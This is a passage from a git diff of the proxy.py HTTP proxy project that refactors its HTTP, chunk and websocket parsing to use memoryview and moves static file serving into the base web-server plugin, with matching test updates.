bytes]: self.body = self.chunk.body self.state = httpParserStates.COMPLETE more = False - elif self._content_expected: + return more, raw + if self._content_expected: self.state = httpParserStates.RCVING_BODY if self.body is None: self.body = b'' @@ -307,23 +316,21 @@ def _process_body(self, raw: bytes) -> Tuple[bool, bytes]: if self.body and \ len(self.body) == int(self.header(b'content-length')): self.state = httpParserStates.COMPLETE - more, raw = len(raw) > 0, raw[total_size - received_size:] - else: - self.state = httpParserStates.RCVING_BODY - # Received a packet without content-length header - # and no transfer-encoding specified. - # - # This can happen for both HTTP/1.0 and HTTP/1.1 scenarios. - # Currently, we consume the remaining buffer as body. - # - # Ref https://github.com/abhinavsingh/proxy.py/issues/398 - # - # See TestHttpParser.test_issue_398 scenario - self.body = raw - more, raw = False, b'' - return more, raw - - def _process_headers(self, raw: bytes) -> Tuple[bool, bytes]: + return len(raw) > 0, raw[total_size - received_size:] + # Received a packet without content-length header + # and no transfer-encoding specified. + # + # This can happen for both HTTP/1.0 and HTTP/1.1 scenarios. + # Currently, we consume the remaining buffer as body. + # + # Ref https://github.com/abhinavsingh/proxy.py/issues/398 + # + # See TestHttpParser.test_issue_398 scenario + self.state = httpParserStates.RCVING_BODY + self.body = raw + return False, memoryview(b'') + + def _process_headers(self, raw: memoryview) -> Tuple[bool, memoryview]: """Returns False when no CRLF could be found in received bytes. TODO: We should not return until parser reaches headers complete @@ -334,10 +341,10 @@ def _process_headers(self, raw: bytes) -> Tuple[bool, bytes]: This will also help make the parser even more stateless. """ while True: - parts = raw.split(CRLF, 1) + parts = raw.tobytes().split(CRLF, 1) if len(parts) == 1: return False, raw - line, raw = parts[0], parts[1] + line, raw = parts[0], memoryview(parts[1]) if self.state in (httpParserStates.LINE_RCVD, httpParserStates.RCVING_HEADERS): if line == b'' or line.strip() == b'': # Blank line received. self.state = httpParserStates.HEADERS_COMPLETE @@ -352,14 +359,14 @@ def _process_headers(self, raw: bytes) -> Tuple[bool, bytes]: def _process_line( self, - raw: bytes, + raw: memoryview, allowed_url_schemes: Optional[List[bytes]] = None, - ) -> Tuple[bool, bytes]: + ) -> Tuple[bool, memoryview]: while True: - parts = raw.split(CRLF, 1) + parts = raw.tobytes().split(CRLF, 1) if len(parts) == 1: return False, raw - line, raw = parts[0], parts[1] + line, raw = parts[0], memoryview(parts[1]) if self.type == httpParserTypes.REQUEST_PARSER: if self.protocol is not None and self.protocol.version is None: # We expect to receive entire proxy protocol v1 line diff --git a/proxy/http/plugin.py b/proxy/http/plugin.py index ff37173773..754fb28024 100644 --- a/proxy/http/plugin.py +++ b/proxy/http/plugin.py @@ -71,9 +71,9 @@ def protocols() -> List[int]: raise NotImplementedError() @abstractmethod - def on_client_data(self, raw: memoryview) -> Optional[memoryview]: + def on_client_data(self, raw: memoryview) -> None: """Called only after original request has been completely received.""" - return raw # pragma: no cover + pass # pragma: no cover @abstractmethod def on_request_complete(self) -> Union[socket.socket, bool]: diff --git a/proxy/http/proxy/plugin.py b/proxy/http/proxy/plugin.py index a71e553b33..7768e3c59d 100644 --- a/proxy/http/proxy/plugin.py +++ b/proxy/http/proxy/plugin.py @@ -121,7 +121,6 @@ def handle_client_request( Return None to drop the request data, e.g. in case a response has already been queued. Raise HttpRequestRejected or HttpProtocolException directly to tear down the connection with client. - """ return request # pragma: no cover diff --git a/proxy/http/proxy/server.py b/proxy/http/proxy/server.py index 10932fde9e..019eb651e7 100644 --- a/proxy/http/proxy/server.py +++ b/proxy/http/proxy/server.py @@ -188,7 +188,7 @@ async def write_to_descriptors(self, w: Writables) -> bool: self.upstream.connection.fileno() in w: logger.debug('Server is write ready, flushing...') try: - self.upstream.flush() + self.upstream.flush(self.flags.max_sendbuf_size) except ssl.SSLWantWriteError: logger.warning( 'SSLWantWriteError while trying to flush to server, will retry', @@ -276,11 +276,8 @@ async def read_from_descriptors(self, r: Readables) -> bool: if self.response.is_complete: self.handle_pipeline_response(raw) else: - # TODO(abhinavsingh): Remove .tobytes after parser is - # memoryview compliant - chunk = raw.tobytes() - self.response.parse(chunk) - self.emit_response_events(len(chunk)) + self.response.parse(raw) + self.emit_response_events(len(raw)) else: self.response.total_size += len(raw) # queue raw data for client @@ -398,7 +395,7 @@ def on_response_chunk(self, chunk: List[memoryview]) -> List[memoryview]: return chunk # Can return None to tear down connection - def on_client_data(self, raw: memoryview) -> Optional[memoryview]: + def on_client_data(self, raw: memoryview) -> None: # For scenarios when an upstream connection was never established, # let plugin do whatever they wish to. These are special scenarios # where plugins are trying to do something magical. Within the core @@ -413,7 +410,7 @@ def on_client_data(self, raw: memoryview) -> Optional[memoryview]: for plugin in self.plugins.values(): o = plugin.handle_client_data(raw) if o is None: - return None + return raw = o elif self.upstream and not self.upstream.closed: # For http proxy requests, handle pipeline case. @@ -429,25 +426,26 @@ def on_client_data(self, raw: memoryview) -> Optional[memoryview]: # upgrade request. Incoming client data now # must be treated as WebSocket protocol packets. self.upstream.queue(raw) - return None - + return if self.pipeline_request is None: # For pipeline requests, we never # want to use --enable-proxy-protocol flag # as proxy protocol header will not be present + # + # TODO: HTTP parser must be smart about detecting + # HA proxy protocol or we must always explicitly pass + # the flag when we are expecting HA proxy protocol + # request line before HTTP request lines. self.pipeline_request = HttpParser( httpParserTypes.REQUEST_PARSER, ) - - # TODO(abhinavsingh): Remove .tobytes after parser is - # memoryview compliant - self.pipeline_request.parse(raw.tobytes()) + self.pipeline_request.parse(raw) if self.pipeline_request.is_complete: for plugin in self.plugins.values(): assert self.pipeline_request is not None r = plugin.handle_client_request(self.pipeline_request) if r is None: - return None + return self.pipeline_request = r assert self.pipeline_request is not None # TODO(abhinavsingh): Remove memoryview wrapping here after @@ -463,8 +461,6 @@ def on_client_data(self, raw: memoryview) -> Optional[memoryview]: # simply queue for upstream server. else: self.upstream.queue(raw) - return None - return raw def on_request_complete(self) -> Union[socket.socket, bool]: self.emit_request_complete() @@ -552,9 +548,7 @@ def handle_pipeline_response(self, raw: memoryview) -> None: self.pipeline_response = HttpParser( httpParserTypes.RESPONSE_PARSER, ) - # TODO(abhinavsingh): Remove .tobytes after parser is memoryview - # compliant - self.pipeline_response.parse(raw.tobytes()) + self.pipeline_response.parse(raw) if self.pipeline_response.is_complete: self.pipeline_response = None @@ -759,7 +753,11 @@ def wrap_server(self) -> bool: assert isinstance(self.upstream.connection, socket.socket) do_close = False try: - self.upstream.wrap(text_(self.request.host), self.flags.ca_file) + self.upstream.wrap( + text_(self.request.host), + self.flags.ca_file, + as_non_blocking=True, + ) except ssl.SSLCertVerificationError: # Server raised certificate verification error # When --disable-interception-on-ssl-cert-verification-error flag is on, # we will cache such upstream hosts and avoid intercepting them for future diff --git a/proxy/http/responses.py b/proxy/http/responses.py index c1e8a17395..8a7ed5be7d 100644 --- a/proxy/http/responses.py +++ b/proxy/http/responses.py @@ -12,9 +12,11 @@ from typing import Any, Dict, Optional from .codes import httpStatusCodes -from ..common.flag import flags from ..common.utils import build_http_response -from ..common.constants import PROXY_AGENT_HEADER_KEY, PROXY_AGENT_HEADER_VALUE +from ..common.constants import ( + PROXY_AGENT_HEADER_KEY, PROXY_AGENT_HEADER_VALUE, + DEFAULT_MIN_COMPRESSION_LENGTH, +) PROXY_TUNNEL_ESTABLISHED_RESPONSE_PKT = memoryview( @@ -98,10 +100,11 @@ def okResponse( content: Optional[bytes] = None, headers: Optional[Dict[bytes, bytes]] = None, compress: bool = True, + min_compression_length: int = DEFAULT_MIN_COMPRESSION_LENGTH, **kwargs: Any, ) -> memoryview: do_compress: bool = False - if flags.args and compress and content and len(content) > flags.args.min_compression_limit: + if compress and content and len(content) > min_compression_length: do_compress = True if not headers: headers = {} diff --git a/proxy/http/server/plugin.py b/proxy/http/server/plugin.py index 7870620033..0115558c18 100644 --- a/proxy/http/server/plugin.py +++ b/proxy/http/server/plugin.py @@ -9,14 +9,17 @@ :license: BSD, see LICENSE for more details. """ import argparse +import mimetypes from abc import ABC, abstractmethod from typing import TYPE_CHECKING, Any, Dict, List, Tuple, Optional from ..parser import HttpParser +from ..responses import NOT_FOUND_RESPONSE_PKT, okResponse from ..websocket import WebsocketFrame from ..connection import HttpClientConnection from ...core.event import EventQueue from ..descriptors import DescriptorsHandlerMixin +from ...common.utils import bytes_ if TYPE_CHECKING: # pragma: no cover @@ -40,6 +43,28 @@ def __init__( self.event_queue = event_queue self.upstream_conn_pool = upstream_conn_pool + @staticmethod + def serve_static_file(path: str, min_compression_length: int) -> memoryview: + try: + with open(path, 'rb') as f: + content = f.read() + content_type = mimetypes.guess_type(path)[0] + if content_type is None: + content_type = 'text/plain' + headers = { + b'Content-Type': bytes_(content_type), + b'Cache-Control': b'max-age=86400', + } + return okResponse( + content=content, + headers=headers, + min_compression_length=min_compression_length, + # TODO: Should we really close or take advantage of keep-alive? + conn_close=True, + ) + except FileNotFoundError: + return NOT_FOUND_RESPONSE_PKT + def name(self) -> str: """A unique name for your plugin. diff --git a/proxy/http/server/reverse.py b/proxy/http/server/reverse.py index 11d5150328..45afe1f91f 100644 --- a/proxy/http/server/reverse.py +++ b/proxy/http/server/reverse.py @@ -83,6 +83,7 @@ def handle_request(self, request: HttpParser) -> None: text_( self.choice.hostname, ), + as_non_blocking=True, ) # Update Host header # if request.has_header(b'Host'): diff --git a/proxy/http/server/web.py b/proxy/http/server/web.py index f6b0a12fc3..06072493b2 100644 --- a/proxy/http/server/web.py +++ b/proxy/http/server/web.py @@ -12,7 +12,6 @@ import time import socket import logging -import mimetypes from typing import Any, Dict, List, Tuple, Union, Pattern, Optional from .plugin import HttpWebServerBasePlugin @@ -21,15 +20,15 @@ from .protocols import httpProtocolTypes from ..exception import HttpProtocolException from ..protocols import httpProtocols -from ..responses import NOT_FOUND_RESPONSE_PKT, okResponse +from ..responses import NOT_FOUND_RESPONSE_PKT from ..websocket import WebsocketFrame, websocketOpcodes from ...common.flag import flags from ...common.types import Readables, Writables, Descriptors -from ...common.utils import text_, bytes_, build_websocket_handshake_response +from ...common.utils import text_, build_websocket_handshake_response from ...common.constants import ( DEFAULT_ENABLE_WEB_SERVER, DEFAULT_STATIC_SERVER_DIR, DEFAULT_ENABLE_REVERSE_PROXY, DEFAULT_ENABLE_STATIC_SERVER, - DEFAULT_MIN_COMPRESSION_LIMIT, DEFAULT_WEB_ACCESS_LOG_FORMAT, + DEFAULT_WEB_ACCESS_LOG_FORMAT, DEFAULT_MIN_COMPRESSION_LENGTH, ) @@ -65,8 +64,8 @@ flags.add_argument( '--min-compression-length', type=int, - default=DEFAULT_MIN_COMPRESSION_LIMIT, - help='Default: ' + str(DEFAULT_MIN_COMPRESSION_LIMIT) + ' bytes. ' + + default=DEFAULT_MIN_COMPRESSION_LENGTH, + help='Default: ' + str(DEFAULT_MIN_COMPRESSION_LENGTH) + ' bytes. ' + 'Sets the minimum length of a response that will be compressed (gzipped).', ) @@ -124,27 +123,6 @@ def encryption_enabled(self) -> bool: return self.flags.keyfile is not None and \ self.flags.certfile is not None - @staticmethod - def read_and_build_static_file_response(path: str) -> memoryview: - try: - with open(path, 'rb') as f: - content = f.read() - content_type = mimetypes.guess_type(path)[0] - if content_type is None: - content_type = 'text/plain' - headers = { - b'Content-Type': bytes_(content_type), - b'Cache-Control': b'max-age=86400', - } - return okResponse( - content=content, - headers=headers, - # TODO: Should we really close or take advantage of keep-alive? - conn_close=True, - ) - except FileNotFoundError: - return NOT_FOUND_RESPONSE_PKT - def switch_to_websocket(self) -> None: self.client.queue( memoryview( @@ -194,10 +172,12 @@ async def read_from_descriptors(self, r: Readables) -> bool: return True return False - def on_client_data(self, raw: memoryview) -> Optional[memoryview]: + def on_client_data(self, raw: memoryview) -> None: if self.switched_protocol == httpProtocolTypes.WEBSOCKET: - # TODO(abhinavsingh): Remove .tobytes after websocket frame parser - # is memoryview compliant + # TODO(abhinavsingh): Do we really tobytes() here? + # Websocket parser currently doesn't depend on internal + # buffers, due to which it can directly parse out of + # memory views. But how about large payloads scenarios? remaining = raw.tobytes() frame = WebsocketFrame() while remaining != b'': @@ -211,7 +191,7 @@ def on_client_data(self, raw: memoryview) -> Optional[memoryview]: assert self.route self.route.on_websocket_message(frame) frame.reset() - return None + return # If 1st valid request was completed and it's a HTTP/1.1 keep-alive # And only if we have a route, parse pipeline requests if self.request.is_complete and \ @@ -221,9 +201,7 @@ def on_client_data(self, raw: memoryview) -> Optional[memoryview]: self.pipeline_request = HttpParser( httpParserTypes.REQUEST_PARSER, ) - # TODO(abhinavsingh): Remove .tobytes after parser is memoryview - # compliant - self.pipeline_request.parse(raw.tobytes()) + self.pipeline_request.parse(raw) if self.pipeline_request.is_complete: self.route.handle_request(self.pipeline_request) if not self.pipeline_request.is_http_1_1_keep_alive: @@ -231,7 +209,6 @@ def on_client_data(self, raw: memoryview) -> Optional[memoryview]: 'Pipelined request is not keep-alive, will tear down request...', ) self.pipeline_request = None - return raw def on_response_chunk(self, chunk: List[memoryview]) -> List[memoryview]: return chunk @@ -310,7 +287,8 @@ def _try_route(self, path: bytes) -> bool: def _try_static_or_404(self, path: bytes) -> None: path = text_(path).split('?', 1)[0] self.client.queue( - self.read_and_build_static_file_response( + HttpWebServerBasePlugin.serve_static_file( self.flags.static_server_dir + path, + self.flags.min_compression_length, ), ) diff --git a/proxy/http/websocket/client.py b/proxy/http/websocket/client.py index c8c53ebee8..2f61cbab89 100644 --- a/proxy/http/websocket/client.py +++ b/proxy/http/websocket/client.py @@ -27,6 +27,9 @@ class WebsocketClient(TcpConnection): + """Websocket client connection. + + TODO: Make me compatible with the work framework.""" def __init__( self, @@ -57,10 +60,14 @@ def connection(self) -> TcpOrTlsSocket: return self.sock def handshake(self) -> None: + """Start websocket upgrade & handshake protocol""" self.upgrade() self.sock.setblocking(False) def upgrade(self) -> None: + """Creates a key and sends websocket handshake packet to upstream. + Receives response from the server and asserts that websocket + accept header is valid in the response.""" key = base64.b64encode(secrets.token_bytes(16)) self.sock.send( build_websocket_handshake_request( @@ -70,16 +77,10 @@ def upgrade(self) -> None: ), ) response = HttpParser(httpParserTypes.RESPONSE_PARSER) - response.parse(self.sock.recv(DEFAULT_BUFFER_SIZE)) + response.parse(memoryview(self.sock.recv(DEFAULT_BUFFER_SIZE))) accept = response.header(b'Sec-Websocket-Accept') assert WebsocketFrame.key_to_accept(key) == accept - def ping(self, data: Optional[bytes] = None) -> None: - pass # pragma: no cover - - def pong(self, data: Optional[bytes] = None) -> None: - pass # pragma: no cover - def shutdown(self, _data: Optional[bytes] = None) -> None: """Closes connection with the server.""" super().close() @@ -93,16 +94,16 @@ def run_once(self) -> bool: self.selector.unregister(self.sock) for _, mask in events: if mask & selectors.EVENT_READ and self.on_message: + # TODO: client recvbuf size flag currently not used here raw = self.recv() - if raw is None or raw.tobytes() == b'': + if raw is None or raw == b'': self.closed = True return True frame = WebsocketFrame() - # TODO(abhinavsingh): Remove .tobytes after parser is - # memoryview compliant frame.parse(raw.tobytes()) self.on_message(frame) elif mask & selectors.EVENT_WRITE: + # TODO: max sendbuf size flag currently not used here self.flush() return False @@ -121,3 +122,4 @@ def run(self) -> None: except OSError: pass self.sock.close() + self.selector.close() diff --git a/proxy/plugin/__init__.py b/proxy/plugin/__init__.py index e76a253468..f75dcbbfc1 100644 --- a/proxy/plugin/__init__.py +++ b/proxy/plugin/__init__.py @@ -11,6 +11,8 @@ .. spelling:: Cloudflare + ws + onmessage """ from .cache import CacheResponsesPlugin, BaseCacheResponsesPlugin from .shortlink import ShortLinkPlugin diff --git a/proxy/plugin/cache/cache_responses.py b/proxy/plugin/cache/cache_responses.py index cbc57ebc16..45bd3174de 100644 --- a/proxy/plugin/cache/cache_responses.py +++ b/proxy/plugin/cache/cache_responses.py @@ -30,6 +30,7 @@ def __init__(self, *args: Any, **kwargs: Any) -> None: self.flags.cache_dir, 'responses', ), + cache_requests=self.flags.cache_requests, ) self.set_store(self.disk_store) diff --git a/proxy/plugin/cache/store/disk.py b/proxy/plugin/cache/store/disk.py index a9ac027ba4..da849b07d9 100644 --- a/proxy/plugin/cache/store/disk.py +++ b/proxy/plugin/cache/store/disk.py @@ -16,7 +16,9 @@ from ....common.flag import flags from ....http.parser import HttpParser from ....common.utils import text_ -from ....common.constants import DEFAULT_CACHE_DIRECTORY_PATH +from ....common.constants import ( + DEFAULT_CACHE_REQUESTS, DEFAULT_CACHE_DIRECTORY_PATH, +) logger = logging.getLogger(__name__) @@ -30,12 +32,21 @@ 'Flag only applicable when cache plugin is used with on-disk storage.', ) +flags.add_argument( + '--cache-requests', + action='store_true', + default=DEFAULT_CACHE_REQUESTS, + help='Default: False. ' + + 'Whether to also cache request packets.', +) + class OnDiskCacheStore(CacheStore): - def __init__(self, uid: str, cache_dir: str) -> None: + def __init__(self, uid: str, cache_dir: str, cache_requests: bool) -> None: super().__init__(uid) self.cache_dir = cache_dir + self.cache_requests = cache_requests self.cache_file_path: Optional[str] = None self.cache_file: Optional[BinaryIO] = None @@ -47,6 +58,8 @@ def open(self, request: HttpParser) -> None: self.cache_file = open(self.cache_file_path, "wb") def cache_request(self, request: HttpParser) -> Optional[HttpParser]: + if self.cache_file and self.cache_requests: + self.cache_file.write(request.build()) return request def cache_response_chunk(self, chunk: memoryview) -> memoryview: diff --git a/proxy/plugin/modify_chunk_response.py b/proxy/plugin/modify_chunk_response.py index 16171e1f11..f050121fc0 100644 --- a/proxy/plugin/modify_chunk_response.py +++ b/proxy/plugin/modify_chunk_response.py @@ -32,7 +32,7 @@ def __init__(self, *args: Any, **kwargs: Any) -> None: def handle_upstream_chunk(self, chunk: memoryview) -> Optional[memoryview]: # Parse the response. # Note that these chunks also include headers - self.response.parse(chunk.tobytes()) + self.response.parse(chunk) # If response is complete, modify and dispatch to client if self.response.is_complete: # Avoid setting a body for responses where a body is not expected. diff --git a/proxy/plugin/modify_post_data.py b/proxy/plugin/modify_post_data.py index d4b5ba6174..a290ed59f0 100644 --- a/proxy/plugin/modify_post_data.py +++ b/proxy/plugin/modify_post_data.py @@ -12,7 +12,7 @@ from ..http import httpMethods from ..http.proxy import HttpProxyBasePlugin -from ..http.parser import HttpParser +from ..http.parser import HttpParser, ChunkParser from ..common.utils import bytes_ @@ -30,14 +30,20 @@ def handle_client_request( self, request: HttpParser, ) -> Optional[HttpParser]: if request.method == httpMethods.POST: - request.body = ModifyPostDataPlugin.MODIFIED_BODY - # Update Content-Length header only when request is NOT chunked - # encoded - if not request.is_chunked_encoded: + # If request data is compressed, compress the body too + body = ModifyPostDataPlugin.MODIFIED_BODY + # If the request is of type chunked encoding + # add post data as chunk + if request.is_chunked_encoded: + body = ChunkParser.to_chunks( + ModifyPostDataPlugin.MODIFIED_BODY, + ) + else: request.add_header( b'Content-Length', - bytes_(len(request.body)), + bytes_(len(body)), ) + request.body = body # Enforce content-type json if request.has_header(b'Content-Type'): request.del_header(b'Content-Type') diff --git a/proxy/plugin/web_server_route.py b/proxy/plugin/web_server_route.py index 205a8f9bf2..3b927cd55d 100644 --- a/proxy/plugin/web_server_route.py +++ b/proxy/plugin/web_server_route.py @@ -7,6 +7,11 @@ :copyright: (c) 2013-present by Abhinav Singh and contributors. :license: BSD, see LICENSE for more details. + + .. spelling:: + + ws + onmessage """ import logging from typing import List, Tuple @@ -14,6 +19,7 @@ from ..http.parser import HttpParser from ..http.server import HttpWebServerBasePlugin, httpProtocolTypes from ..http.responses import okResponse +from ..http.websocket.frame import WebsocketFrame logger = logging.getLogger(__name__) @@ -37,3 +43,15 @@ def handle_request(self, request: HttpParser) -> None: self.client.queue(HTTP_RESPONSE) elif request.path == b'/https-route-example': self.client.queue(HTTPS_RESPONSE) + + def on_websocket_message(self, frame: WebsocketFrame) -> None: + """Open chrome devtools and try using following commands: + + Example: + + ws = new WebSocket("ws://localhost:8899/ws-route-example") + ws.onmessage = function(m) { console.log(m); } + ws.send('hello') + + """ + self.client.queue(memoryview(WebsocketFrame.text(frame.data or b''))) diff --git a/tests/http/exceptions/test_http_request_rejected.py b/tests/http/exceptions/test_http_request_rejected.py index 9a6652d6b8..f50cee770d 100644 --- a/tests/http/exceptions/test_http_request_rejected.py +++ b/tests/http/exceptions/test_http_request_rejected.py @@ -31,6 +31,7 @@ def test_status_code_response(self) -> None: self.assertEqual( e.response(self.request), CRLF.join([ b'HTTP/1.1 200 OK', + b'Content-Length: 0', b'Connection: close', CRLF, ]), diff --git a/tests/http/parser/test_chunk_parser.py b/tests/http/parser/test_chunk_parser.py index 1fde17256a..5df67264f1 100644 --- a/tests/http/parser/test_chunk_parser.py +++ b/tests/http/parser/test_chunk_parser.py @@ -20,16 +20,18 @@ def setUp(self) -> None: def test_chunk_parse_basic(self) -> None: self.parser.parse( - b''.join([ - b'4\r\n', - b'Wiki\r\n', - b'5\r\n', - b'pedia\r\n', - b'E\r\n', - b' in\r\n\r\nchunks.\r\n', - b'0\r\n', - b'\r\n', - ]), + memoryview( + b''.join([ + b'4\r\n', + b'Wiki\r\n', + b'5\r\n', + b'pedia\r\n', + b'E\r\n', + b' in\r\n\r\nchunks.\r\n', + b'0\r\n', + b'\r\n', + ]), + ), ) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, None) @@ -38,7 +40,7 @@ def test_chunk_parse_basic(self) -> None: def test_chunk_parse_issue_27(self) -> None: """Case when data ends with the chunk size but without ending CRLF.""" - self.parser.parse(b'3') + self.parser.parse(memoryview(b'3')) self.assertEqual(self.parser.chunk, b'3') self.assertEqual(self.parser.size, None) self.assertEqual(self.parser.body, b'') @@ -46,7 +48,7 @@ def test_chunk_parse_issue_27(self) -> None: self.parser.state, chunkParserStates.WAITING_FOR_SIZE, ) - self.parser.parse(b'\r\n') + self.parser.parse(memoryview(b'\r\n')) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, 3) self.assertEqual(self.parser.body, b'') @@ -54,7 +56,7 @@ def test_chunk_parse_issue_27(self) -> None: self.parser.state, chunkParserStates.WAITING_FOR_DATA, ) - self.parser.parse(b'abc') + self.parser.parse(memoryview(b'abc')) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, None) self.assertEqual(self.parser.body, b'abc') @@ -62,7 +64,7 @@ def test_chunk_parse_issue_27(self) -> None: self.parser.state, chunkParserStates.WAITING_FOR_SIZE, ) - self.parser.parse(b'\r\n') + self.parser.parse(memoryview(b'\r\n')) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, None) self.assertEqual(self.parser.body, b'abc') @@ -70,7 +72,7 @@ def test_chunk_parse_issue_27(self) -> None: self.parser.state, chunkParserStates.WAITING_FOR_SIZE, ) - self.parser.parse(b'4\r\n') + self.parser.parse(memoryview(b'4\r\n')) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, 4) self.assertEqual(self.parser.body, b'abc') @@ -78,7 +80,7 @@ def test_chunk_parse_issue_27(self) -> None: self.parser.state, chunkParserStates.WAITING_FOR_DATA, ) - self.parser.parse(b'defg\r\n0') + self.parser.parse(memoryview(b'defg\r\n0')) self.assertEqual(self.parser.chunk, b'0') self.assertEqual(self.parser.size, None) self.assertEqual(self.parser.body, b'abcdefg') @@ -86,7 +88,7 @@ def test_chunk_parse_issue_27(self) -> None: self.parser.state, chunkParserStates.WAITING_FOR_SIZE, ) - self.parser.parse(b'\r\n\r\n') + self.parser.parse(memoryview(b'\r\n\r\n')) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, None) self.assertEqual(self.parser.body, b'abcdefg') diff --git a/tests/http/parser/test_http_parser.py b/tests/http/parser/test_http_parser.py index 68510415ea..427553c310 100644 --- a/tests/http/parser/test_http_parser.py +++ b/tests/http/parser/test_http_parser.py @@ -28,37 +28,39 @@ def setUp(self) -> None: def test_issue_127(self) -> None: with self.assertRaises(HttpProtocolException): - self.parser.parse(CRLF) + self.parser.parse(memoryview(CRLF)) with self.assertRaises(HttpProtocolException): raw = b'qwqrqw!@!#@!#ad adfad\r\n' while True: - self.parser.parse(raw) + self.parser.parse(memoryview(raw)) def test_issue_398(self) -> None: p = HttpParser(httpParserTypes.RESPONSE_PARSER) - p.parse(HTTP_1_0 + b' 200 OK' + CRLF) + p.parse(memoryview(HTTP_1_0 + b' 200 OK' + CRLF)) self.assertEqual(p.version, HTTP_1_0) self.assertEqual(p.code, b'200') self.assertEqual(p.reason, b'OK') self.assertEqual(p.state, httpParserStates.LINE_RCVD) p.parse( - b'CP=CAO PSA OUR' + CRLF + - b'Cache-Control:private,max-age=0;' + CRLF + - b'X-Frame-Options:SAMEORIGIN' + CRLF + - b'X-Content-Type-Options:nosniff' + CRLF + - b'X-XSS-Protection:1; mode=block' + CRLF + - b'Content-Security-Policy:default-src \'self\' \'unsafe-inline\' \'unsafe-eval\'' + CRLF + - b'Strict-Transport-Security:max-age=2592000; includeSubdomains' + CRLF + - b'Set-Cookie: lang=eng; path=/;HttpOnly;' + CRLF + - b'Content-type:text/html;charset=UTF-8;' + CRLF + CRLF + - b'', + memoryview( + b'CP=CAO PSA OUR' + CRLF + + b'Cache-Control:private,max-age=0;' + CRLF + + b'X-Frame-Options:SAMEORIGIN' + CRLF + + b'X-Content-Type-Options:nosniff' + CRLF + + b'X-XSS-Protection:1; mode=block' + CRLF + + b'Content-Security-Policy:default-src \'self\' \'unsafe-inline\' \'unsafe-eval\'' + CRLF + + b'Strict-Transport-Security:max-age=2592000; includeSubdomains' + CRLF + + b'Set-Cookie: lang=eng; path=/;HttpOnly;' + CRLF + + b'Content-type:text/html;charset=UTF-8;' + CRLF + CRLF + + b'', + ), ) self.assertEqual(p.body, b'') self.assertEqual(p.state, httpParserStates.RCVING_BODY) def test_urlparse(self) -> None: - self.parser.parse(b'CONNECT httpbin.org:443 HTTP/1.1\r\n') + self.parser.parse(memoryview(b'CONNECT httpbin.org:443 HTTP/1.1\r\n')) self.assertTrue(self.parser.is_https_tunnel) self.assertFalse(self.parser.is_connection_upgrade) self.assertTrue(self.parser.is_http_1_1_keep_alive) @@ -69,40 +71,52 @@ def test_urlparse(self) -> None: self.assertNotEqual(self.parser.state, httpParserStates.COMPLETE) def test_urlparse_on_invalid_connect_request(self) -> None: - self.parser.parse(b'CONNECT / HTTP/1.0\r\n\r\n') + self.parser.parse(memoryview(b'CONNECT / HTTP/1.0\r\n\r\n')) self.assertTrue(self.parser.is_https_tunnel) self.assertEqual(self.parser.host, None) self.assertEqual(self.parser.port, 443) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) def test_unicode_character_domain_connect(self) -> None: - self.parser.parse(bytes_('CONNECT ççç.org:443 HTTP/1.1\r\n')) + self.parser.parse( + memoryview( + bytes_('CONNECT ççç.org:443 HTTP/1.1\r\n'), + ), + ) self.assertTrue(self.parser.is_https_tunnel) self.assertEqual(self.parser.host, bytes_('ççç.org')) self.assertEqual(self.parser.port, 443) def test_invalid_ipv6_in_request_line(self) -> None: self.parser.parse( - bytes_('CONNECT 2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF:443 HTTP/1.1\r\n'), + memoryview( + bytes_('CONNECT 2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF:443 HTTP/1.1\r\n'), + ), ) self.assertTrue(self.parser.is_https_tunnel) self.assertEqual( - self.parser.host, bytes_( - '[2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]', + self.parser.host, memoryview( + bytes_( + '[2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]', + ), ), ) self.assertEqual(self.parser.port, 443) def test_valid_ipv6_in_request_line(self) -> None: self.parser.parse( - bytes_( - 'CONNECT [2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]:443 HTTP/1.1\r\n', + memoryview( + bytes_( + 'CONNECT [2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]:443 HTTP/1.1\r\n', + ), ), ) self.assertTrue(self.parser.is_https_tunnel) self.assertEqual( - self.parser.host, bytes_( - '[2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]', + self.parser.host, memoryview( + bytes_( + '[2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]', + ), ), ) self.assertEqual(self.parser.port, 443) @@ -110,7 +124,7 @@ def test_valid_ipv6_in_request_line(self) -> None: def test_build_request(self) -> None: self.assertEqual( build_http_request( - b'GET', b'http://localhost:12345', b'HTTP/1.1', + b'GET', b'http://localhost:12345', b'HTTP/1.1', no_ua=True, ), CRLF.join([ b'GET http://localhost:12345 HTTP/1.1', @@ -121,6 +135,7 @@ def test_build_request(self) -> None: build_http_request( b'GET', b'http://localhost:12345', b'HTTP/1.1', headers={b'key': b'value'}, + no_ua=True, ), CRLF.join([ b'GET http://localhost:12345 HTTP/1.1', @@ -133,10 +148,12 @@ def test_build_request(self) -> None: b'GET', b'http://localhost:12345', b'HTTP/1.1', headers={b'key': b'value'}, body=b'Hello from py', + no_ua=True, ), CRLF.join([ b'GET http://localhost:12345 HTTP/1.1', b'key: value', + b'Content-Length: 13', CRLF, ]) + b'Hello from py', ) @@ -146,6 +163,7 @@ def test_build_response(self) -> None: okResponse(protocol_version=b'HTTP/1.1'), CRLF.join([ b'HTTP/1.1 200 OK', + b'Content-Length: 0', CRLF, ]), ) @@ -157,6 +175,7 @@ def test_build_response(self) -> None: CRLF.join([ b'HTTP/1.1 200 OK', b'key: value', + b'Content-Length: 0', CRLF, ]), ) @@ -221,9 +240,9 @@ def test_find_line_returns_None(self) -> None: def test_connect_request_with_crlf_as_separate_chunk(self) -> None: """See https://github.com/abhinavsingh/py/issues/70 for background.""" raw = b'CONNECT pypi.org:443 HTTP/1.0\r\n' - self.parser.parse(raw) + self.parser.parse(memoryview(raw)) self.assertEqual(self.parser.state, httpParserStates.LINE_RCVD) - self.parser.parse(CRLF) + self.parser.parse(memoryview(CRLF)) self.assertEqual(self.parser.state, 